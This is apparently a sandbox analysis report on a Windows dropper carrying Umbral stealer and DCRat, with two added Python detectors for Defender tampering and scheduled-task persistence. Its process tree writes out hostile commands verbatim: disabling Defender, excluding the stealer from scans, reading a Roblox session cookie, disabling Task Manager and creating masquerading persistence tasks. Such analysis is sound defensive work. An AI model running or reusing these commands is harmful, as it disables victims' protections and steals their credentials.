Analysis

  • max time kernel
    149s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240419-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240419-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    04-05-2024 01:35

General

  • Target

    a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe

  • Size

    4.3MB

  • MD5

    898a94f29edc228ce3bd2054f3d5d6dd

  • SHA1

    f2b5d32ca5520f35a738ef1ccbbf5fb2160bfbc5

  • SHA256

    a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37

  • SHA512

    8a7ee18864b118bd165b9f97aad3d188cd51985180feedf5c32c2f5acd6d427f05b7e6077a9c0c405bd152a203086203aa306db802e13f917c04040c4b789eae

  • SSDEEP

    49152:ENPuAcWILneTm53Oln3Gl1iy92HEs/sFZ583oMLmUZ8hXyaSvgIsR1SB:ENP0WILeTm5+l2lb40r5837L8iVvIvQ

Malware Config

Signatures

  • DcRat

    DarkCrystal RAT (DCRat) is a .NET RAT, active since June 2019, capable of loading additional plugins.

  • Detect Umbral payload 3 IoCs
  • Process spawned unexpected child process 18 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Umbral

    Umbral stealer is an open-source modular stealer written in C#.

  • DCRat payload 4 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Detects executables attempting to enumerate video devices using WMI 3 IoCs
  • Detects executables containing possible sandbox analysis VM names 3 IoCs
  • Detects executables containing possible sandbox analysis VM usernames 3 IoCs
  • Detects executables containing possible sandbox system UUIDs 3 IoCs
  • Detects executables packed with SmartAssembly 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Disables Task Manager via registry modification
  • Drops file in Drivers directory 1 IoCs
  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Executes dropped EXE 5 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP address.

  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 18 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine the installed video card.

  • Modifies registry class 4 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 54 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs
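The two PowerShell lines under PID 4440 in the process tree (Add-MpPreference in PID 468, Set-MpPreference in PID 5108) are the concrete form of the "Command and Scripting Interpreter: PowerShell" signature above. The following Python script is an added example, not part of the sandbox output or of either malware family's code: it tokenizes such command lines, splits them into statements, and reports every Set-MpPreference parameter set to a protection-weakening value and every Add-MpPreference exclusion. The WEAKENING table and the benign control line (key 0) are this example's assumptions; the two malicious lines are transcribed from the process tree. One caveat for anyone reading the report as a record of what actually changed on the host: `&&` is not a statement separator in Windows PowerShell 5.1, which is what the v1.0\powershell.exe on this image runs, so the PID 5108 command fails to parse as a whole and changes no setting. The detector still flags it, because a rule should alert on the intent, and the PID 468 exclusion stands on its own.

```python
"""Added example: flag Windows Defender tampering in PowerShell command lines
like the two in this report (PIDs 468 and 5108). Not part of the sandbox output."""
import re

# Set-MpPreference parameters and the values that weaken protection. Numeric
# forms are the enum ordinals PowerShell also accepts (SubmitSamplesConsent
# 2 == NeverSend, MAPSReporting 0 == Disabled). Assumed table, not from the page.
WEAKENING = {
    "disablerealtimemonitoring": {"$true", "1"},
    "disableioavprotection": {"$true", "1"},
    "disablescriptscanning": {"$true", "1"},
    "disableintrusionpreventionsystem": {"$true", "1"},
    "disablebehaviormonitoring": {"$true", "1"},
    "mapsreporting": {"disabled", "0"},
    "submitsamplesconsent": {"neversend", "2"},
    "enablecontrolledfolderaccess": {"disabled", "0"},
    "enablenetworkprotection": {"disabled", "auditmode", "0", "2"},
}
# Add-MpPreference parameters that carve scanning holes.
EXCLUSIONS = {"exclusionpath", "exclusionextension", "exclusionprocess"}
TOKEN = re.compile(r"""'([^']*)'|"([^"]*)"|(\S+)""")


def tokenize(cmdline):
    """Split on whitespace while keeping single- or double-quoted spans whole."""
    return [a or b or c for a, b, c in TOKEN.findall(cmdline)]


def statements(tokens):
    """Split a token list into statements at ';' and the '&&' / '||' chain operators."""
    out, cur = [], []
    for tok in tokens:
        if tok in (";", "&&", "||"):
            if cur:
                out.append(cur)
            cur = []
        else:
            cur.append(tok)
    if cur:
        out.append(cur)
    return out


def assess(cmdline):
    """Return (cmdlet, parameter, value) triples that weaken Defender."""
    findings = []
    for stmt in statements(tokenize(cmdline)):
        low = [t.lower() for t in stmt]
        cmdlet = next((c for c in ("set-mppreference", "add-mppreference") if c in low), None)
        if cmdlet is None:
            continue
        i = low.index(cmdlet) + 1
        while i < len(stmt):
            if not low[i].startswith("-"):
                i += 1
                continue
            name, value = low[i][1:], None
            if i + 1 < len(stmt) and not low[i + 1].startswith("-"):
                value = stmt[i + 1]  # -Param value; absent for switches such as -Force
                i += 1
            i += 1
            if cmdlet == "set-mppreference" and value is not None \
                    and value.lower() in WEAKENING.get(name, ()):
                findings.append((cmdlet, name, value))
            elif cmdlet == "add-mppreference" and name in EXCLUSIONS:
                findings.append((cmdlet, name, value))
    return findings


def uses_chain_operator(cmdline):
    """True when '&&' or '||' appears: valid in PowerShell 7+, but a parse error
    in Windows PowerShell 5.1, where the whole command then executes nothing."""
    return any(t in ("&&", "||") for t in tokenize(cmdline))


# Command lines transcribed from the report's process tree, plus one benign
# constructed control line (key 0).
SAMPLES = {
    468: r'''"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\stealer.exe' ''',
    5108: ('"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true '
           '-DisableIOAVProtection $true -DisableRealtimeMonitoring $true '
           '-DisableScriptScanning $true -EnableControlledFolderAccess Disabled '
           '-EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled '
           '-SubmitSamplesConsent NeverSend && powershell Set-MpPreference '
           '-SubmitSamplesConsent 2'),
    0: '"powershell.exe" Get-MpPreference | Select-Object DisableRealtimeMonitoring',
}

if __name__ == "__main__":
    for pid, line in SAMPLES.items():
        print(pid, "chain-op" if uses_chain_operator(line) else "", assess(line))
```

The tokenizer keeps the quoted exclusion path whole, so the finding carries the exact path that would be carved out of scanning; in a real pipeline that value is what you correlate against the "Drops file" and "Executes dropped EXE" events for the same process.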

Processes

  • C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe
    "C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2904
    • C:\Users\Admin\AppData\Local\Temp\stealer.exe
      "C:\Users\Admin\AppData\Local\Temp\stealer.exe"
      2⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4440
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1380
      • C:\Windows\SYSTEM32\attrib.exe
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\stealer.exe"
        3⤵
        • Views/modifies file attributes
        PID:1324
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\stealer.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:468
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5108
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4592
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3116
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" os get Caption
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3480
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" computersystem get totalphysicalmemory
        3⤵
        PID:4824
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
        PID:4124
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:3404
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic" path win32_VideoController get name
        3⤵
        • Detects videocard installed
        PID:3916
      • C:\Windows\SYSTEM32\cmd.exe
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\stealer.exe" && pause
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2940
        • C:\Windows\system32\PING.EXE
          ping localhost
          4⤵
          • Runs ping.exe
          PID:3288
    • C:\Users\Admin\AppData\Local\Temp\чекер dc.exe
      "C:\Users\Admin\AppData\Local\Temp\чекер dc.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:4468
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\MsWinsessiondllNet\zHYxYvywzA0UOqnH8B4aBgoRvO2C5.vbe"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:4532
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\MsWinsessiondllNet\q6hjn2OvCg2VETYAoy3FIOj.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4900
          • C:\MsWinsessiondllNet\driverBrokercommon.exe
            "C:\MsWinsessiondllNet\driverBrokercommon.exe"
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Drops file in Program Files directory
            • Drops file in Windows directory
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:624
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\zv5EjZvQwa.bat"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:3252
              • C:\Windows\system32\w32tm.exe
                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                7⤵
                PID:3080
              • C:\MsWinsessiondllNet\csrss.exe
                "C:\MsWinsessiondllNet\csrss.exe"
                7⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Modifies registry class
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: GetForegroundWindowSpam
                • Suspicious use of WriteProcessMemory
                PID:4688
                • C:\Windows\System32\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9fce6a35-a5d7-4e31-8567-7bee8400eb5e.vbs"
                  8⤵
                  PID:1956
                • C:\Windows\System32\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9802ccd6-4030-46fb-b238-ffcfa505b77a.vbs"
                  8⤵
                  PID:2996
          • C:\Windows\SysWOW64\reg.exe
            reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
            5⤵
            • Modifies registry key
            PID:4744
    • C:\Users\Admin\AppData\Local\Temp\Inject.exe
      "C:\Users\Admin\AppData\Local\Temp\Inject.exe"
      2⤵
      • Executes dropped EXE
      PID:2808
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Users\Admin\Links\System.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:1156
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Users\Admin\Links\System.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4792
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\Links\System.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:1544
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:3376
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:2092
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:224
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\MsWinsessiondllNet\csrss.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:2908
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\csrss.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:3008
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\MsWinsessiondllNet\csrss.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:1980
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 12 /tr "'C:\MsWinsessiondllNet\unsecapp.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:772
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\unsecapp.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:2412
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 10 /tr "'C:\MsWinsessiondllNet\unsecapp.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:3316
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Common Files\Adobe\Acrobat\conhost.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:2420
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Adobe\Acrobat\conhost.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:2368
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Common Files\Adobe\Acrobat\conhost.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:5000
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 5 /tr "'C:\Windows\SystemResources\Windows.UI.ShellCommonInetCore\SearchApp.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:3860
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Windows\SystemResources\Windows.UI.ShellCommonInetCore\SearchApp.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:2392
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 11 /tr "'C:\Windows\SystemResources\Windows.UI.ShellCommonInetCore\SearchApp.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:5068
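The eighteen schtasks.exe entries above follow one template per dropped binary: an ONLOGON task with /rl HIGHEST plus two MINUTE tasks (one plain, one HIGHEST) that re-launch the copy every few minutes, with task names and file names borrowed from system processes (csrss, conhost, RuntimeBroker, SearchApp, unsecapp). The following Python script is an added example, not part of the report or of DCRat: it parses /create command lines, groups them by target and flags masquerading (a system-binary name outside System32, SysWOW64 or SystemApps), a non-standard top-level directory, a user-profile target, a short re-launch interval and /rl HIGHEST. The SYSTEM_BINARIES and directory lists and the benign "NightlyBackup" control line are this example's assumptions; the nine malicious lines are transcribed from the tree. On a live host you would feed it the "Task To Run" column of `schtasks /query /fo CSV /v` rather than process command lines.

```python
"""Added example: triage 'schtasks /create' command lines for the persistence
pattern in this process tree. Not part of the sandbox output or of DCRat."""
import re
from collections import defaultdict
from pathlib import PureWindowsPath

TOKEN = re.compile(r"""'([^']*)'|"([^"]*)"|(\S+)""")
# Names of genuine Windows binaries the dropped copies impersonate, and the
# directories where the real ones live (SearchApp.exe sits under SystemApps).
# Both lists are assumptions for this example.
SYSTEM_BINARIES = {"csrss.exe", "conhost.exe", "runtimebroker.exe",
                   "searchapp.exe", "unsecapp.exe"}
SYSTEM_DIR_PREFIXES = ("c:\\windows\\system32", "c:\\windows\\syswow64",
                       "c:\\windows\\systemapps\\")
STANDARD_TOP = {"windows", "program files", "program files (x86)", "users", "programdata"}


def parse_create(cmdline):
    """Parse 'schtasks.exe /create ...' into a dict; None for any other command."""
    toks = [a or b or c for a, b, c in TOKEN.findall(cmdline)]
    if len(toks) < 2 or PureWindowsPath(toks[0]).stem.lower() != "schtasks" \
            or toks[1].lower() != "/create":
        return None
    opts, i = {}, 2
    while i < len(toks):
        if i + 1 < len(toks) and not toks[i + 1].startswith("/"):
            opts[toks[i].lower()], i = toks[i + 1], i + 2   # /tn name, /mo 9, ...
        else:
            opts[toks[i].lower()], i = True, i + 1          # bare switch such as /f
    return {
        "name": opts.get("/tn"),
        "schedule": str(opts.get("/sc", "")).upper(),
        "interval": int(opts["/mo"]) if "/mo" in opts else None,
        "target": str(opts.get("/tr", "")).strip("'\""),  # /tr "'C:\path'" is doubly quoted
        "highest": str(opts.get("/rl", "")).upper() == "HIGHEST",
    }


def flags(task):
    """Reasons a parsed task looks like malware persistence; empty list if none."""
    p = PureWindowsPath(task["target"])
    parent = str(p.parent).lower()
    out = []
    if p.name.lower() in SYSTEM_BINARIES and not parent.startswith(SYSTEM_DIR_PREFIXES):
        out.append("masquerade: %s outside system directories" % p.name)
    if len(p.parts) > 1 and p.parts[1].lower() not in STANDARD_TOP:
        out.append("non-standard top-level directory: %s" % p.parts[1])
    if "\\users\\" in parent + "\\":
        out.append("target inside a user profile")
    if task["schedule"] == "MINUTE" and task["interval"] and task["interval"] <= 15:
        out.append("re-launched every %d minutes" % task["interval"])
    if task["highest"]:
        out.append("/rl HIGHEST")
    return out


def group_by_target(cmdlines):
    """Group parsed /create tasks by target path to expose the per-binary triad."""
    groups = defaultdict(list)
    for line in cmdlines:
        task = parse_create(line)
        if task:
            groups[task["target"].lower()].append(task)
    return dict(groups)


# Nine of the eighteen schtasks lines from the report, plus one constructed
# benign control line at the end.
SAMPLES = [
    r'''schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Users\Admin\Links\System.exe'" /f''',
    r'''schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Users\Admin\Links\System.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\Links\System.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\MsWinsessiondllNet\csrss.exe'" /f''',
    r'''schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\csrss.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\MsWinsessiondllNet\csrss.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Common Files\Adobe\Acrobat\conhost.exe'" /f''',
    r'''schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Adobe\Acrobat\conhost.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Common Files\Adobe\Acrobat\conhost.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "NightlyBackup" /sc DAILY /st 02:00 /tr "C:\Program Files\Backup\backup.exe"''',
]

if __name__ == "__main__":
    for target, tasks in group_by_target(SAMPLES).items():
        print(target, [(t["name"], t["schedule"], t["interval"], t["highest"]) for t in tasks])
        print("   ", sorted({f for t in tasks for f in flags(t)}))
```

Grouping by target rather than by task name is deliberate: the malware reuses one name for both MINUTE tasks (the second /create with /f overwrites the first), so a name-keyed view would show two tasks per binary and hide the third.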

            Network

            MITRE ATT&CK Enterprise v15

            Downloads

            • C:\MsWinsessiondllNet\driverBrokercommon.exe

              Filesize

              2.3MB

              MD5

              d84e590c3715c79dc5b92c435957d162

              SHA1

              2901580903e4b356448d9fe7bea510261e655363

              SHA256

              d81c1097d231fdcb536974ef025f230d1c4091bab3edcf4f9da9344b44b638ba

              SHA512

              b797cdb43776a7e8a19f9c93299857d8f88651e13c7ba5ddb57f0ac0b24c7b98e6cc6c20ae1561948fb49774edad31cd237f40c9c690d34923ffee56bc02a485

            • C:\MsWinsessiondllNet\q6hjn2OvCg2VETYAoy3FIOj.bat

              Filesize

              158B

              MD5

              ea70d7b0f1a8a1ff2d246efbdcfe1001

              SHA1

              252e762aee8fcc5761e17bb84aa3af8276852f5c

              SHA256

              1947411b5329e6db696c2354b56290b82aaf58b5f5d75fd4f3315fbe27999e31

              SHA512

              1fd28c415177644e069ded3e0ab3d27105fdac2d76f1060abb127e1961f310c81559e4c1213e61a7f32583cee9f4560106cafc88f0f20cf470edb756aadbec86

            • C:\MsWinsessiondllNet\zHYxYvywzA0UOqnH8B4aBgoRvO2C5.vbe

              Filesize

              218B

              MD5

              7c9bb5fda146efee5ee4a243d6e404b0

              SHA1

              c2fb82a9efb3a2469e6a120ac4781a7fe26eb3dd

              SHA256

              1d4b4c4da6c16a2701cec1c24ff21168d26d4f81c0ac8b3e30ed01b8468d488b

              SHA512

              797e74b283e74a3282223d8035408d55269e4451a289e3873ea197624985121c87dccdbdef42ff99fd8b4d1fd7e856388444e3fc699a9d6b061499682a043771

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

              Filesize

              2KB

              MD5

              d85ba6ff808d9e5444a4b369f5bc2730

              SHA1

              31aa9d96590fff6981b315e0b391b575e4c0804a

              SHA256

              84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

              SHA512

              8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              944B

              MD5

              6d42b6da621e8df5674e26b799c8e2aa

              SHA1

              ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

              SHA256

              5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

              SHA512

              53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              948B

              MD5

              74a6b79d36b4aae8b027a218bc6e1af7

              SHA1

              0350e46c1df6934903c4820a00b0bc4721779e5f

              SHA256

              60c64f6803d7ad1408d0a8628100470859b16ef332d5f1bd8bb2debe51251d04

              SHA512

              60e71435a9a23f4c144d641844f4182ddc9aa4ccd3e99232149a187112dce96458aab9587e9fea46f5dc5a52f5ca758969a04657a2b5b10241d3e4554f7c85e0

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              1KB

              MD5

              276798eeb29a49dc6e199768bc9c2e71

              SHA1

              5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

              SHA256

              cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

              SHA512

              0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              1KB

              MD5

              ec1ba4a995d866b282087b26a0539bbc

              SHA1

              c4aeae2bc3fa9a898680648b20102f01e8a811cf

              SHA256

              469da678c3c0364b1b511962cffd44cbfc10aab5c1c528c0c09fd952f08d8a2c

              SHA512

              07bf757ec9d0d368d3ef1bfc2b562895e2708757f8fefa04fa50beaa6fb38af1018ea0cfccf5666c5c8baa4c894deead9652c53e0608aa6a83ef5b396dba43e9

            • C:\Users\Admin\AppData\Local\Temp\9802ccd6-4030-46fb-b238-ffcfa505b77a.vbs

              Filesize

              483B

              MD5

              f9b24b2604a5fb1709d7aeb35c8380da

              SHA1

              bda0adad44295bee07959b64e02afb60e803925b

              SHA256

              9e5df06a97eb719eb8b848c341304499f7d45754eeb7f6f9d74fd10f1274d585

              SHA512

              db91d73cbbe68d76655c6ddbed24f67359bea696828f986017a09dd7f7748ee687080b3437a50b8218ace0ab6c80199a21bb7c5fbe785381f7feb0a3350cceef

            • C:\Users\Admin\AppData\Local\Temp\9fce6a35-a5d7-4e31-8567-7bee8400eb5e.vbs

              Filesize

              707B

              MD5

              8a6fd60053dfa824353b3c4d7385652b

              SHA1

              b73f0af3ceda8e14f2fcb87e1d73b37d9c3f0099

              SHA256

              97a04ad395852217476be9cee64895d876911c8fc783e376e688f40590614f61

              SHA512

              dd3dc973e5e807d68b9c3949b0aa94e811458616964950ea14fbe36548f48954505c607eff28e7d0655b967f89ac3bf7f1d59983d767b7cc2d7af1469ef69a28

            • C:\Users\Admin\AppData\Local\Temp\Inject.exe

              Filesize

              75KB

              MD5

              d428ddd1b0ce85a6c96765aeaf246320

              SHA1

              d100efdaab5b2ad851fe75a28d0aa95deb920926

              SHA256

              453a331db812ed6e0ce6cca5d3b5be26e66c44b5f6fbdc88f98442670b8daecb

              SHA512

              3f9dda9d998ef282eb31644296ef0617bbf40352189f4ccd744191f466e932ffde2fd2bdaebe89f0bc06e465d57a8e46e08b3001fe834b3d989fc71125d25899

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ax1ucl2o.gnu.ps1

              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            • C:\Users\Admin\AppData\Local\Temp\stealer.exe

              Filesize

              229KB

